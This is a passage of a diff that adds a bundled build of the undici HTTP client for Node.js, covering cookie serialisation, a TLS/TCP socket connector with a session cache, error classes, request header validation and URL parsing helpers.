4DIGIT + + GMT = %x47.4D.54 ; "GMT", case-sensitive + + time-of-day = hour ":" minute ":" second + ; 00:00:00 - 23:59:60 (leap second) + + hour = 2DIGIT + minute = 2DIGIT + second = 2DIGIT + */ +function toIMFDate (date) { + if (typeof date === 'number') { + date = new Date(date) + } + + const days = [ + 'Sun', 'Mon', 'Tue', 'Wed', + 'Thu', 'Fri', 'Sat' + ] + + const months = [ + 'Jan', 'Feb', 'Mar', 'Apr', 'May', 'Jun', + 'Jul', 'Aug', 'Sep', 'Oct', 'Nov', 'Dec' + ] + + const dayName = days[date.getUTCDay()] + const day = date.getUTCDate().toString().padStart(2, '0') + const month = months[date.getUTCMonth()] + const year = date.getUTCFullYear() + const hour = date.getUTCHours().toString().padStart(2, '0') + const minute = date.getUTCMinutes().toString().padStart(2, '0') + const second = date.getUTCSeconds().toString().padStart(2, '0') + + return `${dayName}, ${day} ${month} ${year} ${hour}:${minute}:${second} GMT` +} + +/** + max-age-av = "Max-Age=" non-zero-digit *DIGIT + ; In practice, both expires-av and max-age-av + ; are limited to dates representable by the + ; user agent. + * @param {number} maxAge + */ +function validateCookieMaxAge (maxAge) { + if (maxAge < 0) { + throw new Error('Invalid cookie max-age') + } +} + +/** + * @see https://www.rfc-editor.org/rfc/rfc6265#section-4.1.1 + * @param {import('./index').Cookie} cookie + */ +function stringify (cookie) { + if (cookie.name.length === 0) { + return null + } + + validateCookieName(cookie.name) + validateCookieValue(cookie.value) + + const out = [`${cookie.name}=${cookie.value}`] + + // https://datatracker.ietf.org/doc/html/draft-ietf-httpbis-cookie-prefixes-00#section-3.1 + // https://datatracker.ietf.org/doc/html/draft-ietf-httpbis-cookie-prefixes-00#section-3.2 + if (cookie.name.startsWith('__Secure-')) { + cookie.secure = true + } + + if (cookie.name.startsWith('__Host-')) { + cookie.secure = true + cookie.domain = null + cookie.path = '/' + } + + if (cookie.secure) { + out.push('Secure') + } + + if (cookie.httpOnly) { + out.push('HttpOnly') + } + + if (typeof cookie.maxAge === 'number') { + validateCookieMaxAge(cookie.maxAge) + out.push(`Max-Age=${cookie.maxAge}`) + } + + if (cookie.domain) { + validateCookieDomain(cookie.domain) + out.push(`Domain=${cookie.domain}`) + } + + if (cookie.path) { + validateCookiePath(cookie.path) + out.push(`Path=${cookie.path}`) + } + + if (cookie.expires && cookie.expires.toString() !== 'Invalid Date') { + out.push(`Expires=${toIMFDate(cookie.expires)}`) + } + + if (cookie.sameSite) { + out.push(`SameSite=${cookie.sameSite}`) + } + + for (const part of cookie.unparsed) { + if (!part.includes('=')) { + throw new Error('Invalid unparsed') + } + + const [key, ...value] = part.split('=') + + out.push(`${key.trim()}=${value.join('=')}`) + } + + return out.join('; ') +} + +let kHeadersListNode + +function getHeadersList (headers) { + if (headers[kHeadersList]) { + return headers[kHeadersList] + } + + if (!kHeadersListNode) { + kHeadersListNode = Object.getOwnPropertySymbols(headers).find( + (symbol) => symbol.description === 'headers list' + ) + + assert(kHeadersListNode, 'Headers cannot be parsed') + } + + const headersList = headers[kHeadersListNode] + assert(headersList) + + return headersList +} + +module.exports = { + isCTLExcludingHtab, + stringify, + getHeadersList +} + + +/***/ }), + +/***/ 2067: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const net = __nccwpck_require__(1808) +const assert = __nccwpck_require__(9491) +const util = __nccwpck_require__(3983) +const { InvalidArgumentError, ConnectTimeoutError } = __nccwpck_require__(8045) + +let tls // include tls conditionally since it is not always available + +// TODO: session re-use does not wait for the first +// connection to resolve the session and might therefore +// resolve the same servername multiple times even when +// re-use is enabled. + +let SessionCache +// FIXME: remove workaround when the Node bug is fixed +// https://github.com/nodejs/node/issues/49344#issuecomment-1741776308 +if (global.FinalizationRegistry && !process.env.NODE_V8_COVERAGE) { + SessionCache = class WeakSessionCache { + constructor (maxCachedSessions) { + this._maxCachedSessions = maxCachedSessions + this._sessionCache = new Map() + this._sessionRegistry = new global.FinalizationRegistry((key) => { + if (this._sessionCache.size < this._maxCachedSessions) { + return + } + + const ref = this._sessionCache.get(key) + if (ref !== undefined && ref.deref() === undefined) { + this._sessionCache.delete(key) + } + }) + } + + get (sessionKey) { + const ref = this._sessionCache.get(sessionKey) + return ref ? ref.deref() : null + } + + set (sessionKey, session) { + if (this._maxCachedSessions === 0) { + return + } + + this._sessionCache.set(sessionKey, new WeakRef(session)) + this._sessionRegistry.register(session, sessionKey) + } + } +} else { + SessionCache = class SimpleSessionCache { + constructor (maxCachedSessions) { + this._maxCachedSessions = maxCachedSessions + this._sessionCache = new Map() + } + + get (sessionKey) { + return this._sessionCache.get(sessionKey) + } + + set (sessionKey, session) { + if (this._maxCachedSessions === 0) { + return + } + + if (this._sessionCache.size >= this._maxCachedSessions) { + // remove the oldest session + const { value: oldestKey } = this._sessionCache.keys().next() + this._sessionCache.delete(oldestKey) + } + + this._sessionCache.set(sessionKey, session) + } + } +} + +function buildConnector ({ allowH2, maxCachedSessions, socketPath, timeout, ...opts }) { + if (maxCachedSessions != null && (!Number.isInteger(maxCachedSessions) || maxCachedSessions < 0)) { + throw new InvalidArgumentError('maxCachedSessions must be a positive integer or zero') + } + + const options = { path: socketPath, ...opts } + const sessionCache = new SessionCache(maxCachedSessions == null ? 100 : maxCachedSessions) + timeout = timeout == null ? 10e3 : timeout + allowH2 = allowH2 != null ? allowH2 : false + return function connect ({ hostname, host, protocol, port, servername, localAddress, httpSocket }, callback) { + let socket + if (protocol === 'https:') { + if (!tls) { + tls = __nccwpck_require__(4404) + } + servername = servername || options.servername || util.getServerName(host) || null + + const sessionKey = servername || hostname + const session = sessionCache.get(sessionKey) || null + + assert(sessionKey) + + socket = tls.connect({ + highWaterMark: 16384, // TLS in node can't have bigger HWM anyway... + ...options, + servername, + session, + localAddress, + // TODO(HTTP/2): Add support for h2c + ALPNProtocols: allowH2 ? ['http/1.1', 'h2'] : ['http/1.1'], + socket: httpSocket, // upgrade socket connection + port: port || 443, + host: hostname + }) + + socket + .on('session', function (session) { + // TODO (fix): Can a session become invalid once established? Don't think so? + sessionCache.set(sessionKey, session) + }) + } else { + assert(!httpSocket, 'httpSocket can only be sent on TLS update') + socket = net.connect({ + highWaterMark: 64 * 1024, // Same as nodejs fs streams. + ...options, + localAddress, + port: port || 80, + host: hostname + }) + } + + // Set TCP keep alive options on the socket here instead of in connect() for the case of assigning the socket + if (options.keepAlive == null || options.keepAlive) { + const keepAliveInitialDelay = options.keepAliveInitialDelay === undefined ? 60e3 : options.keepAliveInitialDelay + socket.setKeepAlive(true, keepAliveInitialDelay) + } + + const cancelTimeout = setupTimeout(() => onConnectTimeout(socket), timeout) + + socket + .setNoDelay(true) + .once(protocol === 'https:' ? 'secureConnect' : 'connect', function () { + cancelTimeout() + + if (callback) { + const cb = callback + callback = null + cb(null, this) + } + }) + .on('error', function (err) { + cancelTimeout() + + if (callback) { + const cb = callback + callback = null + cb(err) + } + }) + + return socket + } +} + +function setupTimeout (onConnectTimeout, timeout) { + if (!timeout) { + return () => {} + } + + let s1 = null + let s2 = null + const timeoutId = setTimeout(() => { + // setImmediate is added to make sure that we priotorise socket error events over timeouts + s1 = setImmediate(() => { + if (process.platform === 'win32') { + // Windows needs an extra setImmediate probably due to implementation differences in the socket logic + s2 = setImmediate(() => onConnectTimeout()) + } else { + onConnectTimeout() + } + }) + }, timeout) + return () => { + clearTimeout(timeoutId) + clearImmediate(s1) + clearImmediate(s2) + } +} + +function onConnectTimeout (socket) { + util.destroy(socket, new ConnectTimeoutError()) +} + +module.exports = buildConnector + + +/***/ }), + +/***/ 8045: +/***/ ((module) => { + +"use strict"; + + +class UndiciError extends Error { + constructor (message) { + super(message) + this.name = 'UndiciError' + this.code = 'UND_ERR' + } +} + +class ConnectTimeoutError extends UndiciError { + constructor (message) { + super(message) + Error.captureStackTrace(this, ConnectTimeoutError) + this.name = 'ConnectTimeoutError' + this.message = message || 'Connect Timeout Error' + this.code = 'UND_ERR_CONNECT_TIMEOUT' + } +} + +class HeadersTimeoutError extends UndiciError { + constructor (message) { + super(message) + Error.captureStackTrace(this, HeadersTimeoutError) + this.name = 'HeadersTimeoutError' + this.message = message || 'Headers Timeout Error' + this.code = 'UND_ERR_HEADERS_TIMEOUT' + } +} + +class HeadersOverflowError extends UndiciError { + constructor (message) { + super(message) + Error.captureStackTrace(this, HeadersOverflowError) + this.name = 'HeadersOverflowError' + this.message = message || 'Headers Overflow Error' + this.code = 'UND_ERR_HEADERS_OVERFLOW' + } +} + +class BodyTimeoutError extends UndiciError { + constructor (message) { + super(message) + Error.captureStackTrace(this, BodyTimeoutError) + this.name = 'BodyTimeoutError' + this.message = message || 'Body Timeout Error' + this.code = 'UND_ERR_BODY_TIMEOUT' + } +} + +class ResponseStatusCodeError extends UndiciError { + constructor (message, statusCode, headers, body) { + super(message) + Error.captureStackTrace(this, ResponseStatusCodeError) + this.name = 'ResponseStatusCodeError' + this.message = message || 'Response Status Code Error' + this.code = 'UND_ERR_RESPONSE_STATUS_CODE' + this.body = body + this.status = statusCode + this.statusCode = statusCode + this.headers = headers + } +} + +class InvalidArgumentError extends UndiciError { + constructor (message) { + super(message) + Error.captureStackTrace(this, InvalidArgumentError) + this.name = 'InvalidArgumentError' + this.message = message || 'Invalid Argument Error' + this.code = 'UND_ERR_INVALID_ARG' + } +} + +class InvalidReturnValueError extends UndiciError { + constructor (message) { + super(message) + Error.captureStackTrace(this, InvalidReturnValueError) + this.name = 'InvalidReturnValueError' + this.message = message || 'Invalid Return Value Error' + this.code = 'UND_ERR_INVALID_RETURN_VALUE' + } +} + +class RequestAbortedError extends UndiciError { + constructor (message) { + super(message) + Error.captureStackTrace(this, RequestAbortedError) + this.name = 'AbortError' + this.message = message || 'Request aborted' + this.code = 'UND_ERR_ABORTED' + } +} + +class InformationalError extends UndiciError { + constructor (message) { + super(message) + Error.captureStackTrace(this, InformationalError) + this.name = 'InformationalError' + this.message = message || 'Request information' + this.code = 'UND_ERR_INFO' + } +} + +class RequestContentLengthMismatchError extends UndiciError { + constructor (message) { + super(message) + Error.captureStackTrace(this, RequestContentLengthMismatchError) + this.name = 'RequestContentLengthMismatchError' + this.message = message || 'Request body length does not match content-length header' + this.code = 'UND_ERR_REQ_CONTENT_LENGTH_MISMATCH' + } +} + +class ResponseContentLengthMismatchError extends UndiciError { + constructor (message) { + super(message) + Error.captureStackTrace(this, ResponseContentLengthMismatchError) + this.name = 'ResponseContentLengthMismatchError' + this.message = message || 'Response body length does not match content-length header' + this.code = 'UND_ERR_RES_CONTENT_LENGTH_MISMATCH' + } +} + +class ClientDestroyedError extends UndiciError { + constructor (message) { + super(message) + Error.captureStackTrace(this, ClientDestroyedError) + this.name = 'ClientDestroyedError' + this.message = message || 'The client is destroyed' + this.code = 'UND_ERR_DESTROYED' + } +} + +class ClientClosedError extends UndiciError { + constructor (message) { + super(message) + Error.captureStackTrace(this, ClientClosedError) + this.name = 'ClientClosedError' + this.message = message || 'The client is closed' + this.code = 'UND_ERR_CLOSED' + } +} + +class SocketError extends UndiciError { + constructor (message, socket) { + super(message) + Error.captureStackTrace(this, SocketError) + this.name = 'SocketError' + this.message = message || 'Socket error' + this.code = 'UND_ERR_SOCKET' + this.socket = socket + } +} + +class NotSupportedError extends UndiciError { + constructor (message) { + super(message) + Error.captureStackTrace(this, NotSupportedError) + this.name = 'NotSupportedError' + this.message = message || 'Not supported error' + this.code = 'UND_ERR_NOT_SUPPORTED' + } +} + +class BalancedPoolMissingUpstreamError extends UndiciError { + constructor (message) { + super(message) + Error.captureStackTrace(this, NotSupportedError) + this.name = 'MissingUpstreamError' + this.message = message || 'No upstream has been added to the BalancedPool' + this.code = 'UND_ERR_BPL_MISSING_UPSTREAM' + } +} + +class HTTPParserError extends Error { + constructor (message, code, data) { + super(message) + Error.captureStackTrace(this, HTTPParserError) + this.name = 'HTTPParserError' + this.code = code ? `HPE_${code}` : undefined + this.data = data ? data.toString() : undefined + } +} + +class ResponseExceededMaxSizeError extends UndiciError { + constructor (message) { + super(message) + Error.captureStackTrace(this, ResponseExceededMaxSizeError) + this.name = 'ResponseExceededMaxSizeError' + this.message = message || 'Response content exceeded max size' + this.code = 'UND_ERR_RES_EXCEEDED_MAX_SIZE' + } +} + +class RequestRetryError extends UndiciError { + constructor (message, code, { headers, data }) { + super(message) + Error.captureStackTrace(this, RequestRetryError) + this.name = 'RequestRetryError' + this.message = message || 'Request retry error' + this.code = 'UND_ERR_REQ_RETRY' + this.statusCode = code + this.data = data + this.headers = headers + } +} + +module.exports = { + HTTPParserError, + UndiciError, + HeadersTimeoutError, + HeadersOverflowError, + BodyTimeoutError, + RequestContentLengthMismatchError, + ConnectTimeoutError, + ResponseStatusCodeError, + InvalidArgumentError, + InvalidReturnValueError, + RequestAbortedError, + ClientDestroyedError, + ClientClosedError, + InformationalError, + SocketError, + NotSupportedError, + ResponseContentLengthMismatchError, + BalancedPoolMissingUpstreamError, + ResponseExceededMaxSizeError, + RequestRetryError +} + + +/***/ }), + +/***/ 2905: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const { + InvalidArgumentError, + NotSupportedError +} = __nccwpck_require__(8045) +const assert = __nccwpck_require__(9491) +const { kHTTP2BuildRequest, kHTTP2CopyHeaders, kHTTP1BuildRequest } = __nccwpck_require__(2785) +const util = __nccwpck_require__(3983) + +// tokenRegExp and headerCharRegex have been lifted from +// https://github.com/nodejs/node/blob/main/lib/_http_common.js + +/** + * Verifies that the given val is a valid HTTP token + * per the rules defined in RFC 7230 + * See https://tools.ietf.org/html/rfc7230#section-3.2.6 + */ +const tokenRegExp = /^[\^_`a-zA-Z\-0-9!#$%&'*+.|~]+$/ + +/** + * Matches if val contains an invalid field-vchar + * field-value = *( field-content / obs-fold ) + * field-content = field-vchar [ 1*( SP / HTAB ) field-vchar ] + * field-vchar = VCHAR / obs-text + */ +const headerCharRegex = /[^\t\x20-\x7e\x80-\xff]/ + +// Verifies that a given path is valid does not contain control chars \x00 to \x20 +const invalidPathRegex = /[^\u0021-\u00ff]/ + +const kHandler = Symbol('handler') + +const channels = {} + +let extractBody + +try { + const diagnosticsChannel = __nccwpck_require__(7643) + channels.create = diagnosticsChannel.channel('undici:request:create') + channels.bodySent = diagnosticsChannel.channel('undici:request:bodySent') + channels.headers = diagnosticsChannel.channel('undici:request:headers') + channels.trailers = diagnosticsChannel.channel('undici:request:trailers') + channels.error = diagnosticsChannel.channel('undici:request:error') +} catch { + channels.create = { hasSubscribers: false } + channels.bodySent = { hasSubscribers: false } + channels.headers = { hasSubscribers: false } + channels.trailers = { hasSubscribers: false } + channels.error = { hasSubscribers: false } +} + +class Request { + constructor (origin, { + path, + method, + body, + headers, + query, + idempotent, + blocking, + upgrade, + headersTimeout, + bodyTimeout, + reset, + throwOnError, + expectContinue + }, handler) { + if (typeof path !== 'string') { + throw new InvalidArgumentError('path must be a string') + } else if ( + path[0] !== '/' && + !(path.startsWith('http://') || path.startsWith('https://')) && + method !== 'CONNECT' + ) { + throw new InvalidArgumentError('path must be an absolute URL or start with a slash') + } else if (invalidPathRegex.exec(path) !== null) { + throw new InvalidArgumentError('invalid request path') + } + + if (typeof method !== 'string') { + throw new InvalidArgumentError('method must be a string') + } else if (tokenRegExp.exec(method) === null) { + throw new InvalidArgumentError('invalid request method') + } + + if (upgrade && typeof upgrade !== 'string') { + throw new InvalidArgumentError('upgrade must be a string') + } + + if (headersTimeout != null && (!Number.isFinite(headersTimeout) || headersTimeout < 0)) { + throw new InvalidArgumentError('invalid headersTimeout') + } + + if (bodyTimeout != null && (!Number.isFinite(bodyTimeout) || bodyTimeout < 0)) { + throw new InvalidArgumentError('invalid bodyTimeout') + } + + if (reset != null && typeof reset !== 'boolean') { + throw new InvalidArgumentError('invalid reset') + } + + if (expectContinue != null && typeof expectContinue !== 'boolean') { + throw new InvalidArgumentError('invalid expectContinue') + } + + this.headersTimeout = headersTimeout + + this.bodyTimeout = bodyTimeout + + this.throwOnError = throwOnError === true + + this.method = method + + this.abort = null + + if (body == null) { + this.body = null + } else if (util.isStream(body)) { + this.body = body + + const rState = this.body._readableState + if (!rState || !rState.autoDestroy) { + this.endHandler = function autoDestroy () { + util.destroy(this) + } + this.body.on('end', this.endHandler) + } + + this.errorHandler = err => { + if (this.abort) { + this.abort(err) + } else { + this.error = err + } + } + this.body.on('error', this.errorHandler) + } else if (util.isBuffer(body)) { + this.body = body.byteLength ? body : null + } else if (ArrayBuffer.isView(body)) { + this.body = body.buffer.byteLength ? Buffer.from(body.buffer, body.byteOffset, body.byteLength) : null + } else if (body instanceof ArrayBuffer) { + this.body = body.byteLength ? Buffer.from(body) : null + } else if (typeof body === 'string') { + this.body = body.length ? Buffer.from(body) : null + } else if (util.isFormDataLike(body) || util.isIterable(body) || util.isBlobLike(body)) { + this.body = body + } else { + throw new InvalidArgumentError('body must be a string, a Buffer, a Readable stream, an iterable, or an async iterable') + } + + this.completed = false + + this.aborted = false + + this.upgrade = upgrade || null + + this.path = query ? util.buildURL(path, query) : path + + this.origin = origin + + this.idempotent = idempotent == null + ? method === 'HEAD' || method === 'GET' + : idempotent + + this.blocking = blocking == null ? false : blocking + + this.reset = reset == null ? null : reset + + this.host = null + + this.contentLength = null + + this.contentType = null + + this.headers = '' + + // Only for H2 + this.expectContinue = expectContinue != null ? expectContinue : false + + if (Array.isArray(headers)) { + if (headers.length % 2 !== 0) { + throw new InvalidArgumentError('headers array must be even') + } + for (let i = 0; i < headers.length; i += 2) { + processHeader(this, headers[i], headers[i + 1]) + } + } else if (headers && typeof headers === 'object') { + const keys = Object.keys(headers) + for (let i = 0; i < keys.length; i++) { + const key = keys[i] + processHeader(this, key, headers[key]) + } + } else if (headers != null) { + throw new InvalidArgumentError('headers must be an object or an array') + } + + if (util.isFormDataLike(this.body)) { + if (util.nodeMajor < 16 || (util.nodeMajor === 16 && util.nodeMinor < 8)) { + throw new InvalidArgumentError('Form-Data bodies are only supported in node v16.8 and newer.') + } + + if (!extractBody) { + extractBody = (__nccwpck_require__(1472).extractBody) + } + + const [bodyStream, contentType] = extractBody(body) + if (this.contentType == null) { + this.contentType = contentType + this.headers += `content-type: ${contentType}\r\n` + } + this.body = bodyStream.stream + this.contentLength = bodyStream.length + } else if (util.isBlobLike(body) && this.contentType == null && body.type) { + this.contentType = body.type + this.headers += `content-type: ${body.type}\r\n` + } + + util.validateHandler(handler, method, upgrade) + + this.servername = util.getServerName(this.host) + + this[kHandler] = handler + + if (channels.create.hasSubscribers) { + channels.create.publish({ request: this }) + } + } + + onBodySent (chunk) { + if (this[kHandler].onBodySent) { + try { + return this[kHandler].onBodySent(chunk) + } catch (err) { + this.abort(err) + } + } + } + + onRequestSent () { + if (channels.bodySent.hasSubscribers) { + channels.bodySent.publish({ request: this }) + } + + if (this[kHandler].onRequestSent) { + try { + return this[kHandler].onRequestSent() + } catch (err) { + this.abort(err) + } + } + } + + onConnect (abort) { + assert(!this.aborted) + assert(!this.completed) + + if (this.error) { + abort(this.error) + } else { + this.abort = abort + return this[kHandler].onConnect(abort) + } + } + + onHeaders (statusCode, headers, resume, statusText) { + assert(!this.aborted) + assert(!this.completed) + + if (channels.headers.hasSubscribers) { + channels.headers.publish({ request: this, response: { statusCode, headers, statusText } }) + } + + try { + return this[kHandler].onHeaders(statusCode, headers, resume, statusText) + } catch (err) { + this.abort(err) + } + } + + onData (chunk) { + assert(!this.aborted) + assert(!this.completed) + + try { + return this[kHandler].onData(chunk) + } catch (err) { + this.abort(err) + return false + } + } + + onUpgrade (statusCode, headers, socket) { + assert(!this.aborted) + assert(!this.completed) + + return this[kHandler].onUpgrade(statusCode, headers, socket) + } + + onComplete (trailers) { + this.onFinally() + + assert(!this.aborted) + + this.completed = true + if (channels.trailers.hasSubscribers) { + channels.trailers.publish({ request: this, trailers }) + } + + try { + return this[kHandler].onComplete(trailers) + } catch (err) { + // TODO (fix): This might be a bad idea? + this.onError(err) + } + } + + onError (error) { + this.onFinally() + + if (channels.error.hasSubscribers) { + channels.error.publish({ request: this, error }) + } + + if (this.aborted) { + return + } + this.aborted = true + + return this[kHandler].onError(error) + } + + onFinally () { + if (this.errorHandler) { + this.body.off('error', this.errorHandler) + this.errorHandler = null + } + + if (this.endHandler) { + this.body.off('end', this.endHandler) + this.endHandler = null + } + } + + // TODO: adjust to support H2 + addHeader (key, value) { + processHeader(this, key, value) + return this + } + + static [kHTTP1BuildRequest] (origin, opts, handler) { + // TODO: Migrate header parsing here, to make Requests + // HTTP agnostic + return new Request(origin, opts, handler) + } + + static [kHTTP2BuildRequest] (origin, opts, handler) { + const headers = opts.headers + opts = { ...opts, headers: null } + + const request = new Request(origin, opts, handler) + + request.headers = {} + + if (Array.isArray(headers)) { + if (headers.length % 2 !== 0) { + throw new InvalidArgumentError('headers array must be even') + } + for (let i = 0; i < headers.length; i += 2) { + processHeader(request, headers[i], headers[i + 1], true) + } + } else if (headers && typeof headers === 'object') { + const keys = Object.keys(headers) + for (let i = 0; i < keys.length; i++) { + const key = keys[i] + processHeader(request, key, headers[key], true) + } + } else if (headers != null) { + throw new InvalidArgumentError('headers must be an object or an array') + } + + return request + } + + static [kHTTP2CopyHeaders] (raw) { + const rawHeaders = raw.split('\r\n') + const headers = {} + + for (const header of rawHeaders) { + const [key, value] = header.split(': ') + + if (value == null || value.length === 0) continue + + if (headers[key]) headers[key] += `,${value}` + else headers[key] = value + } + + return headers + } +} + +function processHeaderValue (key, val, skipAppend) { + if (val && typeof val === 'object') { + throw new InvalidArgumentError(`invalid ${key} header`) + } + + val = val != null ? `${val}` : '' + + if (headerCharRegex.exec(val) !== null) { + throw new InvalidArgumentError(`invalid ${key} header`) + } + + return skipAppend ? val : `${key}: ${val}\r\n` +} + +function processHeader (request, key, val, skipAppend = false) { + if (val && (typeof val === 'object' && !Array.isArray(val))) { + throw new InvalidArgumentError(`invalid ${key} header`) + } else if (val === undefined) { + return + } + + if ( + request.host === null && + key.length === 4 && + key.toLowerCase() === 'host' + ) { + if (headerCharRegex.exec(val) !== null) { + throw new InvalidArgumentError(`invalid ${key} header`) + } + // Consumed by Client + request.host = val + } else if ( + request.contentLength === null && + key.length === 14 && + key.toLowerCase() === 'content-length' + ) { + request.contentLength = parseInt(val, 10) + if (!Number.isFinite(request.contentLength)) { + throw new InvalidArgumentError('invalid content-length header') + } + } else if ( + request.contentType === null && + key.length === 12 && + key.toLowerCase() === 'content-type' + ) { + request.contentType = val + if (skipAppend) request.headers[key] = processHeaderValue(key, val, skipAppend) + else request.headers += processHeaderValue(key, val) + } else if ( + key.length === 17 && + key.toLowerCase() === 'transfer-encoding' + ) { + throw new InvalidArgumentError('invalid transfer-encoding header') + } else if ( + key.length === 10 && + key.toLowerCase() === 'connection' + ) { + const value = typeof val === 'string' ? val.toLowerCase() : null + if (value !== 'close' && value !== 'keep-alive') { + throw new InvalidArgumentError('invalid connection header') + } else if (value === 'close') { + request.reset = true + } + } else if ( + key.length === 10 && + key.toLowerCase() === 'keep-alive' + ) { + throw new InvalidArgumentError('invalid keep-alive header') + } else if ( + key.length === 7 && + key.toLowerCase() === 'upgrade' + ) { + throw new InvalidArgumentError('invalid upgrade header') + } else if ( + key.length === 6 && + key.toLowerCase() === 'expect' + ) { + throw new NotSupportedError('expect header not supported') + } else if (tokenRegExp.exec(key) === null) { + throw new InvalidArgumentError('invalid header key') + } else { + if (Array.isArray(val)) { + for (let i = 0; i < val.length; i++) { + if (skipAppend) { + if (request.headers[key]) request.headers[key] += `,${processHeaderValue(key, val[i], skipAppend)}` + else request.headers[key] = processHeaderValue(key, val[i], skipAppend) + } else { + request.headers += processHeaderValue(key, val[i]) + } + } + } else { + if (skipAppend) request.headers[key] = processHeaderValue(key, val, skipAppend) + else request.headers += processHeaderValue(key, val) + } + } +} + +module.exports = Request + + +/***/ }), + +/***/ 2785: +/***/ ((module) => { + +module.exports = { + kClose: Symbol('close'), + kDestroy: Symbol('destroy'), + kDispatch: Symbol('dispatch'), + kUrl: Symbol('url'), + kWriting: Symbol('writing'), + kResuming: Symbol('resuming'), + kQueue: Symbol('queue'), + kConnect: Symbol('connect'), + kConnecting: Symbol('connecting'), + kHeadersList: Symbol('headers list'), + kKeepAliveDefaultTimeout: Symbol('default keep alive timeout'), + kKeepAliveMaxTimeout: Symbol('max keep alive timeout'), + kKeepAliveTimeoutThreshold: Symbol('keep alive timeout threshold'), + kKeepAliveTimeoutValue: Symbol('keep alive timeout'), + kKeepAlive: Symbol('keep alive'), + kHeadersTimeout: Symbol('headers timeout'), + kBodyTimeout: Symbol('body timeout'), + kServerName: Symbol('server name'), + kLocalAddress: Symbol('local address'), + kHost: Symbol('host'), + kNoRef: Symbol('no ref'), + kBodyUsed: Symbol('used'), + kRunning: Symbol('running'), + kBlocking: Symbol('blocking'), + kPending: Symbol('pending'), + kSize: Symbol('size'), + kBusy: Symbol('busy'), + kQueued: Symbol('queued'), + kFree: Symbol('free'), + kConnected: Symbol('connected'), + kClosed: Symbol('closed'), + kNeedDrain: Symbol('need drain'), + kReset: Symbol('reset'), + kDestroyed: Symbol.for('nodejs.stream.destroyed'), + kMaxHeadersSize: Symbol('max headers size'), + kRunningIdx: Symbol('running index'), + kPendingIdx: Symbol('pending index'), + kError: Symbol('error'), + kClients: Symbol('clients'), + kClient: Symbol('client'), + kParser: Symbol('parser'), + kOnDestroyed: Symbol('destroy callbacks'), + kPipelining: Symbol('pipelining'), + kSocket: Symbol('socket'), + kHostHeader: Symbol('host header'), + kConnector: Symbol('connector'), + kStrictContentLength: Symbol('strict content length'), + kMaxRedirections: Symbol('maxRedirections'), + kMaxRequests: Symbol('maxRequestsPerClient'), + kProxy: Symbol('proxy agent options'), + kCounter: Symbol('socket request counter'), + kInterceptors: Symbol('dispatch interceptors'), + kMaxResponseSize: Symbol('max response size'), + kHTTP2Session: Symbol('http2Session'), + kHTTP2SessionState: Symbol('http2Session state'), + kHTTP2BuildRequest: Symbol('http2 build request'), + kHTTP1BuildRequest: Symbol('http1 build request'), + kHTTP2CopyHeaders: Symbol('http2 copy headers'), + kHTTPConnVersion: Symbol('http connection version'), + kRetryHandlerDefaultRetry: Symbol('retry agent default retry'), + kConstruct: Symbol('constructable') +} + + +/***/ }), + +/***/ 3983: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const assert = __nccwpck_require__(9491) +const { kDestroyed, kBodyUsed } = __nccwpck_require__(2785) +const { IncomingMessage } = __nccwpck_require__(3685) +const stream = __nccwpck_require__(2781) +const net = __nccwpck_require__(1808) +const { InvalidArgumentError } = __nccwpck_require__(8045) +const { Blob } = __nccwpck_require__(4300) +const nodeUtil = __nccwpck_require__(3837) +const { stringify } = __nccwpck_require__(3477) + +const [nodeMajor, nodeMinor] = process.versions.node.split('.').map(v => Number(v)) + +function nop () {} + +function isStream (obj) { + return obj && typeof obj === 'object' && typeof obj.pipe === 'function' && typeof obj.on === 'function' +} + +// based on https://github.com/node-fetch/fetch-blob/blob/8ab587d34080de94140b54f07168451e7d0b655e/index.js#L229-L241 (MIT License) +function isBlobLike (object) { + return (Blob && object instanceof Blob) || ( + object && + typeof object === 'object' && + (typeof object.stream === 'function' || + typeof object.arrayBuffer === 'function') && + /^(Blob|File)$/.test(object[Symbol.toStringTag]) + ) +} + +function buildURL (url, queryParams) { + if (url.includes('?') || url.includes('#')) { + throw new Error('Query params cannot be passed when url already contains "?" or "#".') + } + + const stringified = stringify(queryParams) + + if (stringified) { + url += '?' + stringified + } + + return url +} + +function parseURL (url) { + if (typeof url === 'string') { + url = new URL(url) + + if (!/^https?:/.test(url.origin || url.protocol)) { + throw new InvalidArgumentError('Invalid URL protocol: the URL must start with `http:` or `https:`.') + } + + return url + } + + if (!url || typeof url !== 'object') { + throw new InvalidArgumentError('Invalid URL: The URL argument must be a non-null object.') + } + + if (!/^https?:/.test(url.origin || url.protocol)) { + throw new InvalidArgumentError('Invalid URL protocol: the URL must start with `http:` or `https:`.') + } + + if (!(url instanceof URL)) { + if (url.port != null && url.port !== '' && !Number.isFinite(parseInt(url.port))) { + throw new InvalidArgumentError('Invalid URL: port must be a valid integer or a string representation of an integer.') + } + + if (url.path != null && typeof url.path !== 'string') { + throw new InvalidArgumentError('Invalid URL path: the path must be a string or null/undefined.') + } + + if (url.pathname != null && typeof url.pathname !== 'string') { + throw new InvalidArgumentError('Invalid URL pathname: the pathname must be a string or null/undefined.') + } + + if (url.hostname != null && typeof url.hostname !== 'string') { + throw new InvalidArgumentError('Invalid URL hostname: the hostname must be a string or null/undefined.') + } + + if (url.origin != null && typeof url.origin !== 'string') { + throw new InvalidArgumentError('Invalid URL origin: the origin must be a string or null/undefined.') + } + + const port = url.port != null + ? url.port + : (url.protocol === 'https:' ? 443 : 80) + let origin = url.origin != null + ? url.origin + : `${url.protocol}//${url.hostname}:${port}` + let path = url.path != null + ? url.path + : `${url.pathname || ''}${url.search || ''}` + + if (origin.endsWith('/')) { + origin = origin.substring(0, origin.length - 1) + } + + if (path && !path.startsWith('/')) { + path = `/${path}` + } + // new URL(path, origin) is unsafe when `path` contains an absolute URL + // From https://developer.mozilla.org/en-US/docs/Web/API/URL/URL: + // If first parameter is a relative URL, second param is required, and will be used as the base URL. + // If first parameter is an absolute URL, a given second param will be ignored. + url = new URL(origin + path) + } + + return url +} + +function parseOrigin (url) { + url = parseURL(url) + + if (url.pathname !== '/' || url.search || url.hash) { + throw new InvalidArgumentError('invalid url') + } + + return url +} + +function getHostname (host) { + if (host[0] === '[') { + const idx = host.indexOf(']') + + assert(idx !== -1) + return host.substring(1, idx) + } + + const idx = host.indexOf(':') + if (idx === -1) return host + + return host.substring(0, idx) +} + +// IP addresses are not valid server names per RFC6066 